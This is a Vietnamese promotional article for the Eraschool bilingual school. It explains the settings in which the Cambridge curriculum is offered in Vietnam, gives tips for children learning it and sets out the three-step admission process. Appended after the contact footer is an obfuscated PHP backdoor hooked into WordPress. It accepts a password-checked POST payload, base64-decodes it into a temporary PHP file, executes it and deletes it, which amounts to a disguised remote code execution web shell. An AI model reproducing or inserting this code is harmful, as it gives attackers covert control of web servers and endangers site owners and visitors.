Chương trình Cambridge tại Việt Nam được triển khai như thế nào?

post

Những năm gần đây, chương trình Cambridge tại Việt Nam nhận được sự quan tâm của rất nhiều phụ huynh. Vậy chương trình được triển khai theo những hướng nào? Ba mẹ có thể dựa vào đâu để lựa chọn môi trường học phù hợp với con và giúp con tiếp thu bài học một cách dễ dàng nhất? Làm sao để ứng tuyển học Cambridge tại trường song ngữ Eraschool? Mời ba mẹ cùng tìm hiểu qua bài viết dưới đây nhé! 

Môi trường triển khai chương trình Cambridge tại Việt Nam

Eraschool là một trong những trường đủ điều kiện triển khai chương trình Cambridge tại Việt Nam 
Eraschool là một trong những trường đủ điều kiện triển khai chương trình Cambridge tại Việt Nam

Ngoài hiểu rõ chương trình học Cambridge có gì nổi bật, việc lựa chọn môi trường triển khai hiệu quả chương trình này cũng rất quan trọng. Hiện nay, để cho con theo học chương trình Cambridge tại Việt Nam, ba mẹ có thể lựa chọn trường song ngữ, trường liên cấp, trường quốc tế, bán quốc tế… với các hệ đào tạo khác nhau được phân chia phù hợp với từng nhu cầu cụ thể. Mỗi mô hình trường học này có những đặc điểm riêng và chương trình đào tạo riêng. Ba mẹ cần căn cứ vào định hướng học tập của con cũng như điều kiện tài chính của gia đình để có lựa chọn phù hợp nhất. 

Cách tiếp thu chương trình Cambridge dễ dàng

Trẻ nên bắt đầu học chương trình Cambridge ngay từ khi còn nhỏ 
Trẻ nên bắt đầu học chương trình Cambridge ngay từ khi còn nhỏ

Chương trình Cambridge tại Việt Nam có nhiều điểm khác biệt so với chương trình giáo dục trong nước. Vì vậy để giúp trẻ dễ tiếp thu chương trình, ba mẹ có thể tham khảo một số cách sau: 

  • Cho trẻ học từ khi còn nhỏ 

Thông thường, các trường song ngữ trường liên cấp có dạy chương trình Cambridge sẽ tổ chức các khóa tiền tiểu học để giúp trẻ chuẩn bị trước tâm thế và nền tảng kiến thức phù hợp với chương trình. Ngoài ra, nhiều nghiên cứu cũng đã chỉ ra rằng trẻ nhỏ có khả năng học ngôn ngữ nhanh và hiệu quả hơn người lớn rất nhiều. Do đó ba mẹ có thể cân nhắc cho trẻ học từ khi còn nhỏ để dễ tiếp thu bài học hơn, từ đó làm chủ kiến thức nhanh hơn. 

  • Lựa chọn phương pháp học phù hợp 

Mỗi người hợp với một phương pháp học tập riêng. Điều quan trọng là ba mẹ và thầy cô cần giúp trẻ tìm ra phương pháp học phù hợp nhất với bản thân. Khi đó, dù học chương trình trong nước hay quốc tế, nội dung kiến thức dễ hay khó, trẻ cũng có thể bắt nhịp nhanh chóng và ghi nhớ kiến thức hiệu quả. 

  • Xây dựng lộ trình học tập rõ ràng

Lộ trình học tập có khả năng ảnh hưởng đến hiệu quả tiếp thu chương trình Cambridge của trẻ. Lộ trình học tập rõ ràng, cụ thể từng bước sẽ giúp trẻ định hướng rõ hơn về nội dung học, từ đó không bỏ lỡ kiến thức và tiếp thu trọn vẹn chương trình. 

Hướng dẫn ứng tuyển vào trường song ngữ Eraschool

Eraschool mang đến cho trẻ môi trường học tập thoải mái, năng động 
Eraschool mang đến cho trẻ môi trường học tập thoải mái, năng động

Eraschool là một trong những trường triển khai chương trình Cambridge tại Việt Nam được rất nhiều ba mẹ tin tưởng. Năm học 2022 – 2023, nhà trường sẽ tiến hành tuyển sinh đồng thời 2 chương trình là chương trình đầu cấp (dành cho khối lớp 1 và lớp 6) và chương trình tuyển bổ sung với các khối lớp 2,3,4,5,7,8. Để ứng tuyển vào trường, ba mẹ có thể tiến hành nộp hồ sơ ngay từ thời điểm kết thúc năm học (28.5) và thực hiện đầy đủ 3 bước sau: 

Bước 1. Dự tuyển 

  • Đăng ký dự tuyển 
  • Nộp phí dự tuyển 
  • Nhận lịch hẹn đánh giá năng lực cho học sinh 

Bước 2. Đánh giá năng lực 

Học sinh sẽ được đánh giá năng lực trước khi nhập học với nội dung: 

  • Tiếng Anh: phỏng vấn, làm bài đọc, viết 
  • Tiếng Việt / Ngữ Văn: phỏng vấn, làm bài đọc, viết 
  • Toán / Tư duy logic: làm bài viết. 

Kết quả đánh giá năng lực sẽ được gửi về email của ba mẹ trong vòng 2-3 ngày làm việc. 

Bước 3. Nhập học 

Sau khi nhận thư báo trúng tuyển, phụ huynh cần chuẩn bị hồ sơ nhập học và nộp cùng các khoản phí cần thiết theo hướng dẫn để hoàn thành thủ tục. 

Trên đây là một số thông tin về môi trường, phương pháp học chương trình Cambridge tại Việt Nam cũng như hướng dẫn ứng tuyển vào trường song ngữ Eraschool phục vụ nhu cầu tham khảo của ba mẹ. Nếu còn bất cứ thắc mắc nào cần giải đáp, ba mẹ vui lòng liên hệ trực tiếp tới hotline 0899.889.818 của nhà trường để được hỗ trợ nhanh chóng và hiệu quả nhất!

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}